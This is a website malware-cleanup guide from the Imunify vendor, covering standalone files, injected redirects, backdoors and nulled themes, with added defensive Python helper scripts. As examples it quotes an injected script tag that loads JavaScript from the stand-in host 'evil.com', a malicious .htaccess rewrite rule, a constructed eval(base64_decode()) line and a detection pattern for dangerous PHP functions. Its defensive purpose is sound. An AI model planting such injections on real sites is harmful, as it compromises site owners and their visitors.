Manual malware cleanup
How to clean a website? How to remove malware? If ImunifyAV, the Linux server antivirus, reports that malware has been found, the guidelines below describe how to clean up the infection manually:
- Step 1: Backup
- Step 2: Understand What the Malware Is
- Step 3: Malware Removal
- Step 4: Repeat
- Step 5: Secure
Step 1: Backup
Before cleaning the website it is highly recommended to perform a full backup of the data undergoing cleanup. For example, for a WordPress-based website - please make sure that backup has been made not only for files but for the database as well.
Step 2: Understand What the Malware Is
First of all, all Imunify products follow the same malware classification convention. Here are a few brief classification examples:
| Malware type | Detection type | ID | filetype.category.classification | Version |
| --- | --- | --- | --- | --- |
| SMW | INJ | 16402 | js.spam.redi | 18 |
| CMW | SA | 12147 | mlw.wshll | 5 |
| SMW | BLKH | 1246640 | php.bkdr.anonfox.autoast | 1 |
SMW stands for Server Malware: the malicious code executes on the server side. CMW means the malicious code executes on the client's side, e.g. in the browser.
INJ means that malicious code was injected into an otherwise legitimate file.
SA and BLKH mean a standalone malware file, i.e. a file that is malicious in its entirety.
Imunify360 can also clean up malware in the database. It uses its innovative MDS (Malware Database Scanner) to clean up arbitrary redirects, spam/phishing, and PHP/JS malware. All regular signatures also apply to the database; additionally, MDS may report CMW-URL-* detections, which are signatures based on Imunify360's own malicious URL database, an advanced global intelligence database.
Step 3: Malware Removal
Manual malware removal will require some basic knowledge of the command line and programming. Alternatively, Imunify360 can handle malware removal in seconds and ensure the reliability of the server.
Step 3.1: Removal of Standalone Malware
If a file is flagged by an -SA- or -BLKH- signature, it is entirely malicious and can be removed completely using the control panel file manager or the Linux CLI.
Here are the top 20 standalone malware verdicts:
- SMW-SA-15778-php.bkdr.wshll.wpnull24
- SMW-SA-12273-mlw.drwy
- SMW-SA-15255-php.bkdr.wshll.wpnull24
- SMW-SA-04892-php.bkdr.wpvcd
- SMW-SA-17965-php.bkdr.wp.fake
- SMW-SA-15534-php.bkdr.drpr.wpnull24
- SMW-SA-12883-mlw.phish
- SMW-SA-13119-mlw.tool.spam.wpvcd
- SMW-SA-15256-php.bkdr.wshll
- SMW-SA-13600-php.phish.gen
- SMW-SA-16489-php.deface.gen
- SMW-SA-15618-php.bkdr.fakeplugin.wpvcd
- SMW-SA-12609-mlw.deface
- SMW-BLKH-74202-elf.trojan
- SMW-BLKH-20827-php.spam
- SMW-BLKH-33002-html.phish
Figure 1 - Standalone malware alert
Backdoors
Standalone malware often spreads freely as part of a nulled (pirated) popular theme or plugin.
Figure 2 - Standalone backdoor in nulled theme
The figure above shows part of a standalone backdoor bundled with a nulled website template, flagged by SMW-SA-15255-php.bkdr.wshll.wpnull24.
Phishing
Another good example of standalone malicious files is phishing. Typically, all phishing infections are standalone. Here is an example that mimics a Google sign-in form, flagged as SMW-SA-18231-html.phish:
Figure 3 - Standalone phishing file
Hacking Tools
The screenshot below shows part of a standalone PHP hacking toolkit produced by the AnonymousFox group; it is flagged as SMW-BLKH-1246640-php.bkdr.anonfox.autoast.
Figure 4 - AnonymousFox hacking tool
Fake Favicon
The listing below shows fake favicon .ico files that carry malicious code inside them.
Top standalone malware file locations cloaked as .ico:
- wp-content/.102ab028.ico
- wp-includes/js/codemirror/.903876dc.ico
- sites/favicon_3bedeb.ico
- favicon_1c9d85.ico
- wp-content/uploads/2015/02/init.locked.ico
- wp-includes/apache.ico
- cgi-bin/.a3269f8f.ico
- wp-content/themes/twentyfourteen/suspected.client.ico
- components/cookie.http.ico
- wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/clases.session.ico
- public_html/favicon.ico
- public_html/fav.ico
- wp-includes/js/tinymce/themes/css.db.ico
- httpdocs/path/modes.session.ico
- public_html/favicon11.ico
- /sites/default/files/favicon.src.ico
- /uploads/suspected.system.ico
Warning!
In some cases, standalone malware might be pulled in as an include file by malware injections in legitimate files on the website. In that case, removing the standalone file might cause 5xx server-side errors or a White Screen Of Death (WSOD) for the website. To be on the safe side, it is mandatory to search from the website webroot for any possible file inclusions. Here is an example of a CLI command that searches for non-obfuscated WP-VCD malware inclusion instructions:
grep -r --include=*.php -e "class.plugin-modules.php" -e "class.theme-modules.php" -e "wp-vcd.php" -e "wp-tmp.php" .
This command will search within the code of all PHP files and return the filenames that contain any mentioning of the detected standalone malware files.
Alternatively, standalone malicious files can be emptied instead of removed completely, so that any left-over inclusion will not cause server errors.
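The two safety steps above (search the webroot for files that include the flagged file, then empty it rather than delete it) as an added example script; this is not code from the Imunify article, and the webroot layout, file names and contents are constructed for the demonstration:

```python
"""Added example (not code from the Imunify article): before removing a file
flagged as standalone malware, find every PHP file under the webroot that
references it (the same check the grep command above performs), then
neutralize the flagged file by emptying it instead of deleting it, so a
left-over include/require does not turn into a fatal error.

All paths and file contents below are constructed for the demo."""
import os
import tempfile
from pathlib import Path


def find_includers(webroot: str, flagged: str) -> list[str]:
    """Paths (relative to webroot) of *.php files that mention the flagged
    file's basename, excluding the flagged file itself."""
    needle = os.path.basename(flagged)
    flagged_path = Path(webroot, flagged).resolve()
    hits = []
    for path in Path(webroot).rglob("*.php"):
        if path.resolve() == flagged_path:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        if needle in text:
            hits.append(str(path.relative_to(webroot)))
    return sorted(hits)


def neutralize_file(webroot: str, flagged: str) -> bool:
    """Truncate the flagged file to zero bytes but keep the path in place.
    Returns True if the file existed and is now empty."""
    target = Path(webroot, flagged)
    if not target.is_file():
        return False
    target.write_bytes(b"")
    return target.stat().st_size == 0


def build_sample_webroot() -> str:
    """Construct a throw-away webroot: one flagged file, one legitimate core
    file that has been injected with an include of it, one untouched file."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "wp-content/plugins/mplugin.php":
            "<?php /* constructed stand-in for a flagged standalone file */ ?>",
        "wp-includes/post.php":
            "<?php\n// constructed: legitimate core file with an injected include\n"
            "include_once ABSPATH . 'wp-content/plugins/mplugin.php';\n",
        "wp-includes/clean.php":
            "<?php\n// constructed: untouched file\necho 'ok';\n",
    }
    for rel, body in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    flagged = "wp-content/plugins/mplugin.php"
    print("files referencing the flagged file:", find_includers(root, flagged))
    print("neutralized:", neutralize_file(root, flagged))
```

Run it against a real site by replacing `build_sample_webroot()` with the site's document root and the flagged path reported by the scanner; every path `find_includers` prints still has to be cleaned by hand, because the include line itself is the injection.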
Step 3.2: Removal of Injected Malware
Injections are a bit trickier. They carry the -INJ- detection type in the verdict. Several kinds of cases that can occur are reviewed in this article, together with what can be done to manually clean out the injections.
Figure 5 - Redirecting JavaScript injection rated as SMW-INJ-18422-js.spam.redi
Redirecting Injections
Top 10 redirecting malware verdicts:
- SMW-INJ-16270-js.spam.redi
- SMW-INJ-18008-js.spam.redi
- SMW-INJ-17803-php.spam.drwy
- SMW-INJ-16402-js.spam.redi
- SMW-INJ-17738-js.spam.redi
- SMW-INJ-17896-js.spam.redi
- SMW-INJ-03990-html.drwy
- SMW-INJ-04270-htcss.mlw
- SMW-INJ-15453-js.spam.redi
- SMW-INJ-18223-js.spam.redi
Redirecting malware usually redirects website users to spam sites, unwanted sites such as pharma or adult websites, phishing pages, or even pages that try to exploit vulnerable client software and compromise the visitor's system.
Figure 6 - .htaccess malware alert
Here is a list of the major redirection types:
- Redirection hack in .htaccess. Example of a redirect based on an injected .htaccess rule:
RewriteRule ^(.*),(.*)$ $2.php?rewrite_params=$1&page_url=$2
Another example is shown in the following figure.
Figure 7 - redirecting .htaccess injection flagged by SMW-INJ-18736-htaccess.spam.redi
- Redirection hidden in CMS core files. Usually it is hidden in wp-config.php. Sometimes redirecting malware injections are hidden in core files like index.php, header.php, footer.php, wp-load.php, etc.
- JavaScript redirection malware infects the JavaScript(.js) files or injects redirecting scripts into PHP files.
Example: SMW-INJ-16402-js.spam.redi-18
Figure 8 - JavaScript redirection malware alert
Mitigation:
- Identify malware code inside the file. Sometimes it can be pretty straightforward, in other cases injection might be hidden.
Different approaches are possible here, for example:
- comparing with old clean backups,
- comparing with the initial repository/vendor package of the CMS, theme, plugin or template.
In most cases it is also possible to identify malicious injection visually:
- obfuscated code inside of regular code,
- different formatting type,
- no line breaks (CR LF symbols).
- Clean out the malware using a control panel file manager or Linux CLI.
The example below shows a malicious redirection link injected as a script tag that loads an external JavaScript file:
<script type='text/javascript' src='evil.com/y.js'></script>
Using the vi, vim, emacs or nano CLI editors, the maliciously injected domain can be removed. Here 'evil.com' is an example of a malicious redirecting domain.
After removal:
<script type='text/javascript' src=''></script>
Of course, the injection might be much more complicated and the amount of code that has to be removed may vary. The following command
$ php -l target_file.php
can be used to make sure that the PHP syntax was not broken by the injection removal.
- If the malware injection is present in the .htaccess file, it might be hard, in some cases, to identify where the injection starts and ends. Incorrect removal of the injection might also break the .htaccess syntax and cause the website to malfunction. To avoid such issues when cleaning .htaccess, it is recommended to restore it from a clean backup taken before the infection appeared, or to copy it from the website of the CMS vendor. For example, samples of WordPress .htaccess files can be found using this link. And here is the link for Joomla!
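The identification hints from the mitigation steps above (external script tags, injected code with no line breaks, rewrite rules in .htaccess that hand requests to a .php target) turned into triage helpers, as an added example. This is not code from the Imunify article; the host allowlist, the line-length threshold, the allowed rewrite targets and the sample HTML/.htaccess are all constructed assumptions for the demonstration:

```python
"""Added example (not code from the Imunify article): triage helpers for the
redirect injections discussed above. They (1) find <script src=...> tags that
load JavaScript from a host outside a site allowlist and strip those tags,
(2) flag files that contain one unusually long line, a common sign of an
injected minified or obfuscated payload, and (3) flag .htaccess RewriteRule
lines that hand requests to an attacker-chosen .php target or another host.
The allowlist, thresholds and samples are constructed for the demo."""
import re
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumed for the demo).
ALLOWED_SCRIPT_HOSTS = {"cdnjs.cloudflare.com"}

SCRIPT_TAG = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*(['"])(?P<src>[^'"]*)\1[^>]*>\s*</script>""",
    re.IGNORECASE,
)


def script_host(src: str) -> str:
    """Host part of a src value, or '' for a path served by the site itself.
    Handles the schemeless 'evil.com/y.js' form used in the article."""
    if src.startswith("//") or "://" in src:
        url = src if "://" in src else "https:" + src
        return (urlparse(url).hostname or "").lower()
    first = src.split("/", 1)[0]
    if "." in first and not src.startswith("/"):
        return first.lower()
    return ""


def is_foreign(src: str) -> bool:
    host = script_host(src)
    return bool(host) and host not in ALLOWED_SCRIPT_HOSTS


def find_foreign_scripts(html: str) -> list[str]:
    """src values of script tags pointing at hosts that are not allowlisted."""
    return [m.group("src") for m in SCRIPT_TAG.finditer(html) if is_foreign(m.group("src"))]


def strip_foreign_scripts(html: str) -> str:
    """Remove the whole offending tag rather than blanking src, so no empty
    <script src=''></script> is left behind."""
    return SCRIPT_TAG.sub(lambda m: "" if is_foreign(m.group("src")) else m.group(0), html)


def longest_line(text: str) -> int:
    return max((len(line) for line in text.splitlines()), default=0)


def looks_packed(text: str, limit: int = 500) -> bool:
    """Article heuristic: injected code often has no line breaks at all."""
    return longest_line(text) > limit


REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.IGNORECASE)
# Targets the site's own rules may use (assumed: a WordPress front controller).
ALLOWED_REWRITE_TARGETS = {"-", "index.php", "/index.php"}


def suspicious_rewrite_rules(htaccess: str) -> list[str]:
    """RewriteRule lines whose target is some other .php script or another host."""
    hits = []
    for line in htaccess.splitlines():
        m = REWRITE_RULE.match(line)
        if not m or m.group(1) in ALLOWED_REWRITE_TARGETS:
            continue
        target = m.group(1)
        if ".php" in target or target.startswith(("http://", "https://")):
            hits.append(line.strip())
    return hits


# Constructed samples: a theme header with one injected tag, and an .htaccess
# that ends with the rule quoted in the article.
SAMPLE_HTML = (
    "<head>\n"
    "<script type='text/javascript' src='/wp-includes/js/jquery.js'></script>\n"
    "<script type='text/javascript' src='evil.com/y.js'></script>\n"
    "<script src='https://cdnjs.cloudflare.com/lib.js'></script>\n"
    "</head>\n"
)
SAMPLE_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteRule ^index\\.php$ - [L]\n"
    "RewriteRule . /index.php [L]\n"
    "RewriteRule ^(.*),(.*)$ $2.php?rewrite_params=$1&page_url=$2\n"
)

if __name__ == "__main__":
    print("foreign scripts:", find_foreign_scripts(SAMPLE_HTML))
    print("suspicious rewrites:", suspicious_rewrite_rules(SAMPLE_HTACCESS))
```

These are heuristics for pointing a reviewer at the right lines, not a replacement for the scanner: a legitimate minified library also trips `looks_packed`, and a site with custom rewrite rules needs those added to `ALLOWED_REWRITE_TARGETS` before the .htaccess check is meaningful.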
Hidden Backdoors
Top 10 verdicts of injected backdoors:
SMW-INJ-03431-php.bkdr.eval.oneliner SMW-INJ-15535-php.bkdr.incl.wpnull24 SMW-INJ-14070-php.bkdr SMW-INJ-04278-php.bkdr SMW-INJ-03933-php.bkdr SMW-INJ-06044-php.bkdr.wpvcd SMW-INJ-17722-php.bkdr.exec SMW-INJ-12444-php.bkdr SMW-INJ-13122-php.bkdr.wp.remote SMW-INJ-03548-php.bkdr |
Dangerous PHP functions such as eval, file_get_contents, create_function, etc., found in files located in wp-includes, images or other locations not designed for direct PHP code execution usually indicate a malware injection. The insert can also be CMS-specific, such as a function that drops an admin user or an attacker auto-login function (as administrator).
Figure 9 - Alert for backdoor found wp-includes
Figure 10 - Backdoor in vim editor
The example above shows a WordPress-targeted backdoor that lets attackers auto-login to the administrator panel. Unfortunately, it is not always easy to identify a backdoor visually. If clean source files of the software are available, it is possible to use `diff` in the server CLI or an online tool such as diffnow to identify the injected code:
Figure X - Difference between the file infected by a backdoor and clean file
Mitigation:
Cleanup for such injections is similar to the previous section: use either the control panel file manager or any preferred CLI editor to remove the malware inserts.
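The two identification techniques from this section (dangerous function calls in locations where PHP should not execute, and a diff against a clean vendor copy) as an added example script. This is not code from the Imunify article and does not reproduce its signatures; the directory list, the function list and every file in the sample tree are constructed assumptions for the demonstration (only the uploads path is one of the locations the article lists):

```python
"""Added example (not code from the Imunify article): two checks for the
hidden backdoors discussed above. `risky_files_outside_code_dirs` lists PHP
files under directories where executable code is not expected (uploads,
images, cache) that call dangerous functions such as eval or
create_function; `injected_lines` compares an infected file with its clean
vendor copy, as the article suggests doing with `diff`, and returns only the
added lines. The directory list, the function list and all file contents are
constructed for the demo, not Imunify signatures."""
import difflib
import re
import tempfile
from pathlib import Path

DANGEROUS_CALLS = re.compile(
    r"\b(eval|create_function|assert|system|shell_exec|passthru|base64_decode)\s*\(",
    re.IGNORECASE,
)
# Directories of a WordPress install that should never hold PHP (assumed list).
NO_PHP_EXPECTED = ("wp-content/uploads", "wp-includes/images", "wp-content/cache")


def risky_calls(text: str) -> list[str]:
    """Distinct dangerous function names called in the given PHP source."""
    return sorted({m.group(1).lower() for m in DANGEROUS_CALLS.finditer(text)})


def risky_files_outside_code_dirs(webroot: str) -> dict[str, list[str]]:
    """Map relative path -> dangerous calls, for PHP files in NO_PHP_EXPECTED dirs."""
    root = Path(webroot)
    found = {}
    for prefix in NO_PHP_EXPECTED:
        base = root / prefix
        if not base.is_dir():
            continue
        for php in base.rglob("*.php"):
            calls = risky_calls(php.read_text(errors="replace"))
            if calls:
                found[str(php.relative_to(root))] = calls
    return found


def injected_lines(clean: str, infected: str) -> list[str]:
    """Lines present in the infected file but absent from the clean copy."""
    diff = difflib.unified_diff(clean.splitlines(), infected.splitlines(), lineterm="", n=0)
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


# Constructed clean/infected pair standing in for a theme header.php.
CLEAN_HEADER = "<?php\n/* constructed theme header */\nwp_head();\n?>\n<body>\n"
INFECTED_LINE = "eval(base64_decode('Q09OU1RSVUNURUQ='));  // constructed: decodes to the word CONSTRUCTED"
INFECTED_HEADER = CLEAN_HEADER.replace("wp_head();", INFECTED_LINE + "\nwp_head();")


def build_sample_webroot() -> str:
    """Throw-away tree: one backdoor-like file in uploads (path taken from the
    article's list), one legitimate plugin file outside the scanned dirs, and
    a non-PHP upload that must be ignored."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "wp-content/uploads/2021/08/xuipenhd.php": "<?php " + INFECTED_LINE + "\n",
        "wp-content/plugins/demo/demo.php": "<?php\nadd_action('init', 'demo_init');\n",
        "wp-content/uploads/readme.txt": "plain text, not scanned\n",
    }
    for rel, body in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    print("risky files:", risky_files_outside_code_dirs(root))
    print("injected lines:", injected_lines(CLEAN_HEADER, INFECTED_HEADER))
```

The diff check only works when the clean copy is the same version as the file being examined, so record the theme or plugin version before downloading the vendor package; a version mismatch produces many "added" lines that are merely legitimate updates.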
Figure 11 - Beginning of redirecting PHP injection inside nulled theme file flagged by SMW-INJ-13960-php.bkdr.wpvcd
Nulled Themes Malware
Top 10 nulled theme injections:
- SMW-INJ-15535-php.bkdr.incl.wpnull24
- SMW-SA-04892-php.bkdr.wpvcd
- SMW-INJ-15539-php.bkdr.incl.wpnull24
- SMW-INJ-12809-php.bkdr.wpvcd
- SMW-INJ-06044-php.bkdr.wpvcd
- SMW-INJ-03674-php.bkdr.wpvcd
- SMW-INJ-13126-php.bkdr.wpvcd
- SMW-SA-18218-php.bkdr.wpvcd
- SMW-INJ-13129-php.bkdr.wpvcd
A large part of the modern malware landscape consists of injections coming from nulled (cracked) premium CMS templates. Such injections very often look similar to normal WordPress theme code.
Figure 12 - WPVCD infection alert for WordPress core file
Here the injection itself looks pretty benign:
Figure 13 - WPVCD injection that executes an additional file that contains a backdoor
Top 10 included backdoor file locations (some of them might be standalone malware, others not):
- /wp-content/plugins/mplugin.php
- /wp-content/themes/exampletheme/class.theme-modules.php
- /wp-content/plugins/xmplplgn/functions/class.plugin-modules.php
- /assets/.default
- /wp-includes/js/tinymce/themes/themes.php
- /wp-admin/css/colors/colors.php
- /wp-content/uploads/2021/08/xuipenhd.php
- /wp-content/uploads/woocommerce_uploads/ytxpdvte.php
- /wp-content/plugins/monit.php
- /modules/mod_wrapper/nepetfzv.php
Nulled themes quite often carry a massive number of backdoor injections in almost every file they contain. Cleaning up all infections manually may take some time, or will require some coding skills to automate the task.
Mitigation
Cleaning a nulled theme manually might be tricky, since a clean version of the software might not be available and in some cases it may be hard to tell which code is injected. The best option here is to restore the website from a backup taken prior to the theme installation and replace the theme with a clean (non-hacked) version. Alternatively, follow the steps described above for standalone and injected malware to attempt to clean up the files manually.
Step 4: Repeat
Finally, after cleanup is done - rescan the website and make sure no more malware is present on the website. If something is still present - please repeat the steps of this guide starting from Step 2.
Step 5: Secure
After cleanup is completed follow this guide to make sure the infection will not happen again.
Conclusion
This article covers more than 50% of infection cases that the Imunify malware processing team saw during the last month. Naturally, there could be other even more complex variations of infections. A description of how to remove such malware just couldn’t fit into a blog article. Regardless of whether it is a typical infection or rare case - ImunifyAV+ could handle any of those malicious files. Please consider ImunifyAV+ as your tool of choice to fight malicious infections - it provides the built-in, one-click cleanup feature. Or get it as part of Imunify360's complete and comprehensive website security solution, which also includes an intelligent WAF, IDS and IPS, Proactive Defense, automated kernel patch management and more.